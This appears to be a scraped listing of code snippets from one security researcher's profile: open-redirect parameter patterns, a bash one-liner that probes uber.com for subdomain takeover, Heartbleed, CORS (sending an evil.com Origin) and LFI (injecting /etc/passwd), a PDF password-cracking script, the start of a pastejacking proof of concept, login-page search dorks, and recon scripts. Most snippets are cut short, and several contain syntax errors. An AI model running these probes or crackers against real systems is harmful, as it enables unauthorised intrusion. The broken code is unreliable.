JoyGhoshs

{
    "flags": "-iE",
     "patterns": [

         "url=",
         "next=",
         "target=",
         "rurl=",
         "dest=",

JoyGhoshs

target=uber.com ; echo "SCANNING FOR SUBDOMAINS " ;assetfinder --subs-only $target | tee subdomains ;echo "SCANING FOR HEARTBLEED VULNERABILITY " ;cat subdomains | while read line ; do echo "QUIT";done | openssl s_client -connect $line:443 2>&1 | grep 'server extension "heartbeat" (id=15)' || echo $line: safe; done;echo "SCANNING FOR SUBDOMAIN TAKEOVER VULNERABILITY";subjack -w subdomains -t 100 -timeout 30 -ssl -c ~/go/src/github.com/haccer/subjack/fingerprints.json -v 3 |tee takeover ;echo "HTTPROBE FOR HTTP/HTTPS";cat subdomains |httprobe|tee hosts;echo "EXTRACTING PAGE LINKS WAYBACKURL" wayback $target |tee pagelinks;echo "CHECKING FOR CORS MISCONFIGURATION"; gau $target | while read url;do target=$(curl -s -I -H "Origin: https://evil.com" -X GET $url) | if grep 'https://evil.com'; then [Potentional CORS Found]echo $url;else echo Nothing on "$url";fi;done;echo "CHEAKING FOR LFI";cat pagelinks|gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'

JoyGhoshs

import pikepdf
from tqdm import tqdm
pass = [ line.strip() for line in open("yourwordlist") ]
for password in tqdm(passwords, "[*] Cracking PDF"):
    try:
        with pikepdf.open("target.pdf", password=pass) as pdf:
            print("[+] Cracked Password:", password)
            break
    except pikepdf._qpdf.PasswordError as e:
        continue

JoyGhoshs

<html>
<head>
<title> POC-Pastejacking </title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="preconnect" href="https://fonts.googleapis.com">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link href="https://fonts.googleapis.com/css2?family=Glory:wght@100&display=swap" rel="stylesheet">
<script>
document.addEventListener("contextmenu", function(e){
    e.preventDefault();

JoyGhoshs

#!/usr/bin/env python3
import requests
import json
import sys
import os
execute=os.system
__Author__="Joy Ghosh [System00 Security]"
def passive(domain):
        bufferoverrun=requests.get(f'https://dns.bufferover.run/dns?q={domain}').json()
        buff_dump=json.dumps(bufferoverrun)

JoyGhoshs

#!/bin/bash
import requests
from bs4 import BeautifulSoup as bs
from urllib.parse import urljoin

def js(domain):
    session = requests.Session()
    session.headers["User-Agent"] = "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36"
    html = session.get(domain).content
    soup = bs(html, "html.parser")

JoyGhoshs

site:*/sign-in
site:*/account/login
site:*/forum/ucp.php?mode=login
inurl:memberlist.php?mode=viewprofile
intitle:"EdgeOS" intext:"Please login"
inurl:user_login.php
intitle:"Web Management Login"
site:*/users/login_form
site:*/access/unauthenticated
site:account.*.*/login

JoyGhoshs

import requests
from bs4 import BeautifulSoup
from colorama import Fore, Style
def leakix_search(ip):
        get = requests.get(f'https://leakix.net/host/{ip}')
        comp = BeautifulSoup(get.content, 'lxml')
        search = comp.find_all('pre',class_="rounded p-1 wrap")
        for data in search:
            print(f'{Fore.RED}[+]{Fore.WHITE}  {ip} {Fore.RED}[LEAK]{Fore.WHITE}')
            print()

JoyGhoshs

import requests
import json
import sys
import argparse
import re
import json
import time
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

JoyGhoshs

#!/usr/bin/bash
domain=$1
email=$(whois $domain | grep "Registrant Email" | egrep -ho "[[:graph:]]+@[[:graph:]]+")
curl -s -A "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36" "https://viewdns.info/reversewhois/?q=$email" | html2text | grep -Po "[-a-zA-Z0-9@:%._\+~#=]{1,256}\.[a-zA-Z0-9()]{1,6}\b([-a-zA-Z0-9()@:%_\+.~#?&//=]*)" | tail -n +4  | head -n -1